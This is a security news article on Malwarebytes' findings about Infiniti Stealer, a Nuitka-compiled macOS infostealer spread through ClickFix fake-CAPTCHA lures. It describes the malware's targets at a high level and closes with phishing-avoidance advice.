- Malwarebytes uncovers Infiniti Stealer targeting macOS via ClickFix social engineering
- Victims tricked into running malicious Terminal code, bypassing traditional defenses
- Stealer compiled with Nuitka, exfiltrates browser credentials, Keychain data, wallets, and screenshots
MacOS devices are being increasingly targeted with malware, as security researchers discover yet another infostealer variant in the wild.
Malwarebytes published an in-depth report on a piece of malware called Infiniti Stealer, which was apparently compiled in a rather unusual fashion.
Infiniti Stealer is apparently distributed via a ClickFix social engineering attack. A ClickFix attack tricks the victim by presenting a “problem” and, at the same time, offering a “solution”. In this case, Malwarebytes says the victims are being redirected to update-check[.]com (most likely through phishing emails claiming certain software needs updating in order to work properly) where they are shown a benign-looking CAPTCHA.
Compiled with Nuitka
Besides the usual “I am not a robot” checkbox, the CAPTCHA has an additional step (which should also serve as a major red flag): to open Spotlight (the built-in search tool), run Terminal, and paste the given code. This code runs a dropper which, in turn, delivers Infiniti Stealer.
“Because the user runs the command directly, many traditional defenses are bypassed,” Malwarebytes explained. “There’s no exploit, no malicious attachment, and no drive‑by download.”
What makes this malware stand out is the fact that it is written in Python, but compiled with Nuitka, a compiler that converts Python code into standalone executables or optimized binaries.
The resulting product is a native macOS binary which, according to the researchers, makes it harder to analyze and detect compared to your typical off-the-shelf Python-based malware.
“To our knowledge, this is the first documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python stealer,” Malwarebytes said.
An infostealer is a malware variant designed to exfiltrate sensitive data from target devices. Usually delivered through social engineering, infostealers get installed through droppers, and try to upload various types of information to an attacker-controlled server, including browser data (cookies, stored passwords, cryptocurrency wallet plugins, etc.) passwords, sensitive files (.docx, .txt, .pdf, and other formats), and other files deemed of value.
Depending on the type of malware, these can try to upload more or less data, and come with different obfuscation and persistence mechanisms.
How to stay safe from phishing and infostealers
Infiniti is capable of stealing a wide range of sensitive data. Primarily, it hunts for credentials from Chromium-based browsers, as well as Firefox. It can exfiltrate macOS Keychain entries, cryptocurrency wallets, and plaintext secrets in developer files such as .env. Finally, it will also exfiltrate screenshots captured during execution.
Social engineering is a popular scam tactic, and phishing emails continue being the biggest attack vector out there. To prevent falling prey to these campaigns, exercise caution and a high level of skepticism towards any and all incoming communications, be it email, instant messaging, or phone. Double-check all links being shared in the email, and hunt for typos, letters replaced by numbers, and otherwise suspicious variations of known domains. (For example, microsoft is often spelled with an “RN” instead of “M” in phishing emails - rnicrosoft - making it almost indistinguishable).
Be careful when downloading attachments (especially when receiving an unexpected message) and make sure you’re running phishing-proof multi-factor authentication.
Via BleepingComputer
